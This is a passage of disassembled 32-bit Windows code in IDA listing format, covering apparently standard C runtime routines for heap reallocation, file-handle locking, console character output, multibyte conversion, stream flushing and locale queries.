call __SEH_prolog4
mov ebx, [ebp+arg_0]
test ebx, ebx
jnz short loc_40B7C3
push [ebp+arg_4]
call sub_403B17
pop ecx
jmp loc_40B98F
; ---------------------------------------------------------------------------
loc_40B7C3: ; CODE XREF: sub_40B7A2+11�j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_40B7D6
push ebx
call sub_40405A
pop ecx
jmp loc_40B98D
; ---------------------------------------------------------------------------
loc_40B7D6: ; CODE XREF: sub_40B7A2+26�j
cmp dword_413B88, 3
jnz loc_40B976
loc_40B7E3: ; CODE XREF: sub_40B7A2+169�j
xor edi, edi
mov [ebp+var_1C], edi
cmp esi, 0FFFFFFE0h
ja loc_40B97B
push 4
call sub_405121
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_40519A
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz loc_40B8AC
cmp esi, dword_413B94
ja short loc_40B85F
push esi
push ebx
push eax
call sub_40568F
add esp, 0Ch
test eax, eax
jz short loc_40B82A
mov [ebp+var_1C], ebx
jmp short loc_40B85F
; ---------------------------------------------------------------------------
loc_40B82A: ; CODE XREF: sub_40B7A2+81�j
push esi
call sub_40596E
pop ecx
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_40B85F
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_40B842
mov eax, esi
loc_40B842: ; CODE XREF: sub_40B7A2+9C�j
push eax
push ebx
push [ebp+var_1C]
call sub_403BE0
push ebx
call sub_40519A
mov [ebp+var_20], eax
push ebx
push eax
call sub_4051C5
add esp, 18h
loc_40B85F: ; CODE XREF: sub_40B7A2+72�j
; sub_40B7A2+86�j ...
cmp [ebp+var_1C], edi
jnz short loc_40B8AC
cmp esi, edi
jnz short loc_40B86E
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_40B86E: ; CODE XREF: sub_40B7A2+C4�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push dword_41157C
call dword_40D0F8 ; RtlAllocateHeap
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_40B8AC
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_40B896
mov eax, esi
loc_40B896: ; CODE XREF: sub_40B7A2+F0�j
push eax
push ebx
push [ebp+var_1C]
call sub_403BE0
push ebx
push [ebp+var_20]
call sub_4051C5
add esp, 14h
loc_40B8AC: ; CODE XREF: sub_40B7A2+66�j
; sub_40B7A2+C0�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40B8E6
cmp [ebp+var_20], 0
jnz short loc_40B8EF
test esi, esi
jnz short loc_40B8C3
inc esi
loc_40B8C3: ; CODE XREF: sub_40B7A2+11E�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push 0
push dword_41157C
call dword_40D13C ; RtlReAllocateHeap
mov edi, eax
jmp short loc_40B8F2
sub_40B7A2 endp
; =============== S U B R O U T I N E =======================================
sub_40B8E0 proc near ; DATA XREF: seg001:0040E778�o
mov esi, [ebp+0Ch]
mov ebx, [ebp+8]
sub_40B8E0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B8E6 proc near ; CODE XREF: sub_40B7A2+111�p
push 4
call sub_405049
pop ecx
retn
sub_40B8E6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40B7A2
loc_40B8EF: ; CODE XREF: sub_40B7A2+11A�j
mov edi, [ebp+var_1C]
loc_40B8F2: ; CODE XREF: sub_40B7A2+13C�j
test edi, edi
jnz loc_40B9B9
cmp dword_411898, edi
jz short loc_40B92E
push esi
call sub_405F45
pop ecx
test eax, eax
jnz loc_40B7E3
call sub_403F8F
cmp [ebp+var_20], edi
jnz short loc_40B987
loc_40B91B: ; CODE XREF: sub_40B7A2+1F8�j
mov esi, eax
call dword_40D050 ; RtlGetLastWin32Error
push eax
call sub_403F54
pop ecx
mov [esi], eax
jmp short loc_40B98D
; ---------------------------------------------------------------------------
loc_40B92E: ; CODE XREF: sub_40B7A2+15E�j
test edi, edi
jnz loc_40B9B9
call sub_403F8F
cmp [ebp+var_20], edi
jz short loc_40B9A8
mov dword ptr [eax], 0Ch
jmp short loc_40B9B9
; ---------------------------------------------------------------------------
loc_40B948: ; CODE XREF: sub_40B7A2+1D7�j
test esi, esi
jnz short loc_40B94D
inc esi
loc_40B94D: ; CODE XREF: sub_40B7A2+1A8�j
push esi
push ebx
push 0
push dword_41157C
call dword_40D13C ; RtlReAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_40B9B9
cmp dword_411898, eax
jz short loc_40B99F
push esi
call sub_405F45
pop ecx
test eax, eax
jz short loc_40B995
loc_40B976: ; CODE XREF: sub_40B7A2+3B�j
cmp esi, 0FFFFFFE0h
jbe short loc_40B948
loc_40B97B: ; CODE XREF: sub_40B7A2+49�j
push esi
call sub_405F45
pop ecx
call sub_403F8F
loc_40B987: ; CODE XREF: sub_40B7A2+177�j
mov dword ptr [eax], 0Ch
loc_40B98D: ; CODE XREF: sub_40B7A2+2F�j
; sub_40B7A2+18A�j
xor eax, eax
loc_40B98F: ; CODE XREF: sub_40B7A2+1C�j
; sub_40B7A2+219�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_40B995: ; CODE XREF: sub_40B7A2+1D2�j
call sub_403F8F
jmp loc_40B91B
; ---------------------------------------------------------------------------
loc_40B99F: ; CODE XREF: sub_40B7A2+1C7�j
test edi, edi
jnz short loc_40B9B9
call sub_403F8F
loc_40B9A8: ; CODE XREF: sub_40B7A2+19C�j
mov esi, eax
call dword_40D050 ; RtlGetLastWin32Error
push eax
call sub_403F54
mov [esi], eax
pop ecx
loc_40B9B9: ; CODE XREF: sub_40B7A2+152�j
; sub_40B7A2+18E�j ...
mov eax, edi
jmp short loc_40B98F
; END OF FUNCTION CHUNK FOR sub_40B7A2
; =============== S U B R O U T I N E =======================================
sub_40B9BD proc near ; CODE XREF: sub_40C431+62�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push ebx
xor ebx, ebx
cmp ecx, ebx
push esi
push edi
jl short loc_40BA25
cmp ecx, dword_413A68
jnb short loc_40BA25
mov esi, ecx
and esi, 1Fh
imul esi, 38h
mov eax, ecx
sar eax, 5
lea edi, ds:413A80h[eax*4]
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_40BA25
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_40BA25
cmp dword_4105D0, 1
jnz short loc_40BA1B
sub ecx, ebx
jz short loc_40BA12
dec ecx
jz short loc_40BA0D
dec ecx
jnz short loc_40BA1B
push ebx
push 0FFFFFFF4h
jmp short loc_40BA15
; ---------------------------------------------------------------------------
loc_40BA0D: ; CODE XREF: sub_40B9BD+46�j
push ebx
push 0FFFFFFF5h
jmp short loc_40BA15
; ---------------------------------------------------------------------------
loc_40BA12: ; CODE XREF: sub_40B9BD+43�j
push ebx
push 0FFFFFFF6h
loc_40BA15: ; CODE XREF: sub_40B9BD+4E�j
; sub_40B9BD+53�j
call dword_40D08C ; SetStdHandle
loc_40BA1B: ; CODE XREF: sub_40B9BD+3F�j
; sub_40B9BD+49�j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_40BA3A
; ---------------------------------------------------------------------------
loc_40BA25: ; CODE XREF: sub_40B9BD+B�j
; sub_40B9BD+13�j ...
call sub_403F8F
mov dword ptr [eax], 9
call sub_403FA2
mov [eax], ebx
or eax, 0FFFFFFFFh
loc_40BA3A: ; CODE XREF: sub_40B9BD+66�j
pop edi
pop esi
pop ebx
retn
sub_40B9BD endp
; =============== S U B R O U T I N E =======================================
sub_40BA3E proc near ; CODE XREF: sub_409C48+17�p
; sub_40C2EF+85�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40BA5E
call sub_403FA2
and dword ptr [eax], 0
call sub_403F8F
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40BA5E: ; CODE XREF: sub_40BA3E+7�j
push esi
xor esi, esi
cmp eax, esi
jl short loc_40BA87
cmp eax, dword_413A68
jnb short loc_40BA87
mov ecx, eax
and eax, 1Fh
imul eax, 38h
sar ecx, 5
mov ecx, dword_413A80[ecx*4]
add eax, ecx
test byte ptr [eax+4], 1
jnz short loc_40BAAB
loc_40BA87: ; CODE XREF: sub_40BA3E+25�j
; sub_40BA3E+2D�j
call sub_403FA2
mov [eax], esi
call sub_403F8F
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 9
call sub_404E8B
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_40BAAB: ; CODE XREF: sub_40BA3E+47�j
mov eax, [eax]
pop esi
retn
sub_40BA3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BAAF proc near ; CODE XREF: sub_409CCB+AF�p
; sub_40A3AA+7F�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_40E780
call __SEH_prolog4
mov edi, [ebp+arg_0]
mov eax, edi
sar eax, 5
mov esi, edi
and esi, 1Fh
imul esi, 38h
add esi, dword_413A80[eax*4]
mov [ebp+var_1C], 1
xor ebx, ebx
cmp [esi+8], ebx
jnz short loc_40BB16
push 0Ah
call sub_405121
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi+8], ebx
jnz short loc_40BB0A
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_407B1C
pop ecx
pop ecx
test eax, eax
jnz short loc_40BB07
mov [ebp+var_1C], ebx
loc_40BB07: ; CODE XREF: sub_40BAAF+53�j
inc dword ptr [esi+8]
loc_40BB0A: ; CODE XREF: sub_40BAAF+3F�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40BB46
loc_40BB16: ; CODE XREF: sub_40BAAF+2F�j
cmp [ebp+var_1C], ebx
jz short loc_40BB38
mov eax, edi
sar eax, 5
and edi, 1Fh
imul edi, 38h
mov eax, dword_413A80[eax*4]
lea eax, [eax+edi+0Ch]
push eax
call dword_40D130 ; RtlEnterCriticalSection
loc_40BB38: ; CODE XREF: sub_40BAAF+6A�j
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40BAAF endp
; =============== S U B R O U T I N E =======================================
sub_40BB41 proc near ; DATA XREF: seg001:0040E798�o
xor ebx, ebx
mov edi, [ebp+8]
sub_40BB41 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40BB46 proc near ; CODE XREF: sub_40BAAF+62�p
push 0Ah
call sub_405049
pop ecx
retn
sub_40BB46 endp
; =============== S U B R O U T I N E =======================================
sub_40BB4F proc near ; CODE XREF: sub_409DDA+3�p
; sub_40A47C+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
imul eax, 38h
sar ecx, 5
mov ecx, dword_413A80[ecx*4]
lea eax, [ecx+eax+0Ch]
push eax
call dword_40D12C ; RtlLeaveCriticalSection
retn
sub_40BB4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB71 proc near ; CODE XREF: sub_409DE4+2A1�p
; sub_409DE4+2C1�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_410440
xor eax, ebp
mov [ebp+var_4], eax
push esi
xor esi, esi
cmp dword_411290, esi
jz short loc_40BBDA
cmp dword_411354, 0FFFFFFFEh
jnz short loc_40BB9A
call sub_40C1B5
loc_40BB9A: ; CODE XREF: sub_40BB71+22�j
mov eax, dword_411354
cmp eax, 0FFFFFFFFh
jnz short loc_40BBAA
loc_40BBA4: ; CODE XREF: sub_40BB71+56�j
; sub_40BB71+61�j ...
or ax, 0FFFFh
jmp short loc_40BC1A
; ---------------------------------------------------------------------------
loc_40BBAA: ; CODE XREF: sub_40BB71+31�j
push esi
lea ecx, [ebp+var_10]
push ecx
push 1
lea ecx, [ebp+arg_0]
push ecx
push eax
call dword_40D080 ; WriteConsoleW
test eax, eax
jnz short loc_40BC27
cmp dword_411290, 2
jnz short loc_40BBA4
call dword_40D050 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_40BBA4
mov dword_411290, esi
loc_40BBDA: ; CODE XREF: sub_40BB71+19�j
push esi
push esi
push 5
lea eax, [ebp+var_C]
push eax
push 1
lea eax, [ebp+arg_0]
push eax
push esi
call dword_40D084 ; GetConsoleOutputCP
push eax
call dword_40D19C ; WideCharToMultiByte
mov ecx, dword_411354
cmp ecx, 0FFFFFFFFh
jz short loc_40BBA4
push esi
lea edx, [ebp+var_10]
push edx
push eax
lea eax, [ebp+var_C]
push eax
push ecx
call dword_40D088 ; WriteConsoleA
test eax, eax
jz short loc_40BBA4
loc_40BC16: ; CODE XREF: sub_40BB71+C0�j
mov ax, [ebp+arg_0]
loc_40BC1A: ; CODE XREF: sub_40BB71+37�j
mov ecx, [ebp+var_4]
xor ecx, ebp
pop esi
call sub_403F45
leave
retn
; ---------------------------------------------------------------------------
loc_40BC27: ; CODE XREF: sub_40BB71+4D�j
mov dword_411290, 1
jmp short loc_40BC16
sub_40BB71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC33 proc near ; CODE XREF: sub_40BD46+E�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_40BC57
cmp [ebp+arg_8], ebx
jz short loc_40BC57
cmp [esi], bl
jnz short loc_40BC5D
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40BC57
mov [eax], bx
loc_40BC57: ; CODE XREF: sub_40BC33+F�j
; sub_40BC33+14�j ...
xor eax, eax
loc_40BC59: ; CODE XREF: sub_40BC33+5A�j
; sub_40BC33+BB�j ...
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40BC5D: ; CODE XREF: sub_40BC33+18�j
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_4048C8
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_40BC8F
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40BC7E
movzx cx, byte ptr [esi]
mov [eax], cx
loc_40BC7E: ; CODE XREF: sub_40BC33+42�j
; sub_40BC33+10B�j
cmp [ebp+var_4], bl
jz short loc_40BC8A
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40BC8A: ; CODE XREF: sub_40BC33+4E�j
xor eax, eax
inc eax
jmp short loc_40BC59
; ---------------------------------------------------------------------------
loc_40BC8F: ; CODE XREF: sub_40BC33+3B�j
lea eax, [ebp+var_10]
push eax
movzx eax, byte ptr [esi]
push eax
call sub_40A886
test eax, eax
pop ecx
pop ecx
jz short loc_40BD1F
mov eax, [ebp+var_10]
mov ecx, [eax+0ACh]
cmp ecx, 1
jle short loc_40BCD5
cmp [ebp+arg_8], ecx
jl short loc_40BCD5
xor edx, edx
cmp [ebp+arg_0], ebx
setnz dl
push edx
push [ebp+arg_0]
push ecx
push esi
push 9
push dword ptr [eax+4]
call dword_40D0F0 ; MultiByteToWideChar
test eax, eax
mov eax, [ebp+var_10]
jnz short loc_40BCE5
loc_40BCD5: ; CODE XREF: sub_40BC33+7B�j
; sub_40BC33+80�j
mov ecx, [ebp+arg_8]
cmp ecx, [eax+0ACh]
jb short loc_40BD00
cmp [esi+1], bl
jz short loc_40BD00
loc_40BCE5: ; CODE XREF: sub_40BC33+A0�j
cmp [ebp+var_4], bl
mov eax, [eax+0ACh]
jz loc_40BC59
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40BC59
; ---------------------------------------------------------------------------
loc_40BD00: ; CODE XREF: sub_40BC33+AB�j
; sub_40BC33+B0�j ...
call sub_403F8F
mov dword ptr [eax], 2Ah
cmp [ebp+var_4], bl
jz short loc_40BD17
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40BD17: ; CODE XREF: sub_40BC33+DB�j
or eax, 0FFFFFFFFh
jmp loc_40BC59
; ---------------------------------------------------------------------------
loc_40BD1F: ; CODE XREF: sub_40BC33+6D�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
mov eax, [ebp+var_10]
push 1
push esi
push 9
push dword ptr [eax+4]
call dword_40D0F0 ; MultiByteToWideChar
test eax, eax
jnz loc_40BC7E
jmp short loc_40BD00
sub_40BC33 endp
; =============== S U B R O U T I N E =======================================
sub_40BD46 proc near ; CODE XREF: sub_409DE4+18E�p
; sub_409DE4+1BC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40BC33
add esp, 10h
retn
sub_40BD46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BD5D proc near ; CODE XREF: sub_40A5DF+E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset dword_40E7A0
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
push 1
call sub_405121
pop ecx
mov [ebp+ms_exc.disabled], ebx
push 3
pop edi
loc_40BD7C: ; CODE XREF: sub_40BD5D+7F�j
mov [ebp+var_20], edi
cmp edi, dword_413A60
jge short loc_40BDDE
mov esi, edi
shl esi, 2
mov eax, dword_412A58
add eax, esi
cmp [eax], ebx
jz short loc_40BDDB
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jz short loc_40BDAE
push eax
call sub_40C273
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_40BDAE
inc [ebp+var_1C]
loc_40BDAE: ; CODE XREF: sub_40BD5D+40�j
; sub_40BD5D+4C�j
cmp edi, 14h
jl short loc_40BDDB
mov eax, dword_412A58
mov eax, [esi+eax]
add eax, 20h
push eax
call dword_40D128 ; RtlDeleteCriticalSection
mov eax, dword_412A58
push dword ptr [esi+eax]
call sub_40405A
pop ecx
mov eax, dword_412A58
mov [esi+eax], ebx
loc_40BDDB: ; CODE XREF: sub_40BD5D+38�j
; sub_40BD5D+54�j
inc edi
jmp short loc_40BD7C
; ---------------------------------------------------------------------------
loc_40BDDE: ; CODE XREF: sub_40BD5D+28�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40BDF3
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40BD5D endp
; =============== S U B R O U T I N E =======================================
sub_40BDF3 proc near ; CODE XREF: sub_40BD5D+88�p
; DATA XREF: seg001:0040E7B8�o
push 1
call sub_405049
pop ecx
retn
sub_40BDF3 endp
; =============== S U B R O U T I N E =======================================
sub_40BDFC proc near ; CODE XREF: sub_40BE5E+13�p
; sub_40C201+33�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_40BE50
test ax, 108h
jz short loc_40BE50
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_40BE4F
push edi
push eax
push esi
call sub_40A6C9
pop ecx
push eax
call sub_40A3AA
add esp, 0Ch
cmp eax, edi
jnz short loc_40BE48
mov eax, [esi+0Ch]
test al, al
jns short loc_40BE4F
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_40BE4F
; ---------------------------------------------------------------------------
loc_40BE48: ; CODE XREF: sub_40BDFC+3B�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_40BE4F: ; CODE XREF: sub_40BDFC+25�j
; sub_40BDFC+42�j ...
pop edi
loc_40BE50: ; CODE XREF: sub_40BDFC+13�j
; sub_40BDFC+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_40BDFC endp
; =============== S U B R O U T I N E =======================================
sub_40BE5E proc near ; CODE XREF: sub_40BEA0+69�p
; sub_40BEA0+84�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_40BE70
push esi
call sub_40BEA0
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_40BE70: ; CODE XREF: sub_40BE5E+7�j
push esi
call sub_40BDFC
test eax, eax
pop ecx
jz short loc_40BE80
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_40BE80: ; CODE XREF: sub_40BE5E+1B�j
test word ptr [esi+0Ch], 4000h
jz short loc_40BE9C
push esi
call sub_40A6C9
push eax
call sub_40C2EF
pop ecx
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40BE9C: ; CODE XREF: sub_40BE5E+28�j
xor eax, eax
pop esi
retn
sub_40BE5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BEA0 proc near ; CODE XREF: sub_40BE5E+A�p
; sub_40BF7A+2�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0040BF53 SIZE 0000001E BYTES
push 14h
push offset dword_40E7C0
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_24], edi
push 1
call sub_405121
pop ecx
mov [ebp+ms_exc.disabled], edi
xor esi, esi
loc_40BEC1: ; CODE XREF: sub_40BEA0+9B�j
mov [ebp+var_20], esi
cmp esi, dword_413A60
jge loc_40BF53
mov eax, dword_412A58
lea eax, [eax+esi*4]
cmp [eax], edi
jz short loc_40BF3A
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jz short loc_40BF3A
push eax
push esi
call sub_40A63B
pop ecx
pop ecx
xor edx, edx
inc edx
mov [ebp+ms_exc.disabled], edx
mov eax, dword_412A58
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_40BF32
cmp [ebp+arg_0], edx
jnz short loc_40BF19
push eax
call sub_40BE5E
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_40BF32
inc [ebp+var_1C]
jmp short loc_40BF32
; ---------------------------------------------------------------------------
loc_40BF19: ; CODE XREF: sub_40BEA0+66�j
cmp [ebp+arg_0], edi
jnz short loc_40BF32
test cl, 2
jz short loc_40BF32
push eax
call sub_40BE5E
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_40BF32
or [ebp+var_24], eax
loc_40BF32: ; CODE XREF: sub_40BEA0+61�j
; sub_40BEA0+72�j ...
mov [ebp+ms_exc.disabled], edi
call sub_40BF42
loc_40BF3A: ; CODE XREF: sub_40BEA0+3A�j
; sub_40BEA0+42�j
inc esi
jmp short loc_40BEC1
sub_40BEA0 endp
; =============== S U B R O U T I N E =======================================
sub_40BF3D proc near ; DATA XREF: seg001:0040E7E4�o
xor edi, edi
mov esi, [ebp-20h]
sub_40BF3D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40BF42 proc near ; CODE XREF: sub_40BEA0+95�p
mov eax, dword_412A58
push dword ptr [eax+esi*4]
push esi
call sub_40A69F
pop ecx
pop ecx
retn
sub_40BF42 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40BEA0
loc_40BF53: ; CODE XREF: sub_40BEA0+2A�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40BF71
cmp [ebp+arg_0], 1
mov eax, [ebp+var_1C]
jz short loc_40BF6B
mov eax, [ebp+var_24]
loc_40BF6B: ; CODE XREF: sub_40BEA0+C6�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40BEA0
; =============== S U B R O U T I N E =======================================
sub_40BF71 proc near ; CODE XREF: sub_40BEA0+BA�p
; DATA XREF: seg001:0040E7D8�o
push 1
call sub_405049
pop ecx
retn
sub_40BF71 endp
; =============== S U B R O U T I N E =======================================
sub_40BF7A proc near ; CODE XREF: sub_40A5DF�p
push 1
call sub_40BEA0
pop ecx
retn
sub_40BF7A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BF90 proc near ; CODE XREF: sub_40AD4B+F3�p
; sub_40AD4B+1B1�p ...
arg_0 = byte ptr 4
push ecx
lea ecx, [esp+4+arg_0]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp sub_4047F0
sub_40BF90 endp
; ---------------------------------------------------------------------------
push ecx
lea ecx, [esp+8]
sub ecx, eax
and ecx, 7
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp sub_4047F0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BFBC proc near ; CODE XREF: sub_40AD4B+25A�p
; sub_40B130+150�p
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_410440
xor eax, ebp
mov [ebp+var_4], eax
push 6
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
mov [ebp+var_6], 0
call dword_40D0A0 ; GetLocaleInfoA
test eax, eax
jnz short loc_40BFED
or eax, 0FFFFFFFFh
jmp short loc_40BFF7
; ---------------------------------------------------------------------------
loc_40BFED: ; CODE XREF: sub_40BFBC+2A�j
lea eax, [ebp+var_C]
push eax
call sub_40454B
pop ecx
loc_40BFF7: ; CODE XREF: sub_40BFBC+2F�j
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_403F45
leave
retn
sub_40BFBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C003 proc near ; CODE XREF: sub_40AD4B+285�p
; sub_40AD4B+336�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
mov eax, dword_410440
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_10]
mov [ebp+var_28], eax
mov eax, [ebp+arg_C]
push ebx
mov [ebp+var_30], eax
mov eax, [eax]
push esi
mov [ebp+var_24], eax
mov eax, [ebp+arg_0]
push edi
xor edi, edi
cmp eax, [ebp+arg_4]
mov [ebp+var_34], ecx
mov [ebp+var_20], edi
mov [ebp+var_2C], edi
jz loc_40C1A0
mov esi, dword_40D180
lea ecx, [ebp+var_18]
push ecx
push eax
call esi ; GetCPInfo
test eax, eax
mov ebx, dword_40D0F0
jz short loc_40C0B6
cmp [ebp+var_18], 1
jnz short loc_40C0B6
lea eax, [ebp+var_18]
push eax
push [ebp+arg_4]
call esi ; GetCPInfo
test eax, eax
jz short loc_40C0B6
cmp [ebp+var_18], 1
jnz short loc_40C0B6
mov esi, [ebp+var_24]
cmp esi, 0FFFFFFFFh
mov [ebp+var_2C], 1
jnz short loc_40C08C
push [ebp+var_28]
call sub_404F20
mov esi, eax
pop ecx
inc esi
loc_40C08C: ; CODE XREF: sub_40C003+7B�j
cmp esi, edi
loc_40C08E: ; CODE XREF: sub_40C003+C6�j
jle short loc_40C0EB
cmp esi, 7FFFFFF0h
ja short loc_40C0EB
lea eax, [esi+esi+8]
cmp eax, 400h
ja short loc_40C0D2
call sub_40BF90
mov eax, esp
cmp eax, edi
jz short loc_40C0E6
mov dword ptr [eax], 0CCCCh
jmp short loc_40C0E3
; ---------------------------------------------------------------------------
loc_40C0B6: ; CODE XREF: sub_40C003+53�j
; sub_40C003+59�j ...
push edi
push edi
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx ; MultiByteToWideChar
mov esi, eax
cmp esi, edi
jnz short loc_40C08E
loc_40C0CB: ; CODE XREF: sub_40C003+EE�j
xor eax, eax
jmp loc_40C1A3
; ---------------------------------------------------------------------------
loc_40C0D2: ; CODE XREF: sub_40C003+9E�j
push eax
call sub_403B17
cmp eax, edi
pop ecx
jz short loc_40C0E6
mov dword ptr [eax], 0DDDDh
loc_40C0E3: ; CODE XREF: sub_40C003+B1�j
add eax, 8
loc_40C0E6: ; CODE XREF: sub_40C003+A9�j
; sub_40C003+D8�j
mov [ebp+var_1C], eax
jmp short loc_40C0EE
; ---------------------------------------------------------------------------
loc_40C0EB: ; CODE XREF: sub_40C003:loc_40C08E�j
; sub_40C003+93�j
mov [ebp+var_1C], edi
loc_40C0EE: ; CODE XREF: sub_40C003+E6�j
cmp [ebp+var_1C], edi
jz short loc_40C0CB
lea eax, [esi+esi]
push eax
push edi
push [ebp+var_1C]
call sub_403FE0
add esp, 0Ch
push esi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx ; MultiByteToWideChar
test eax, eax
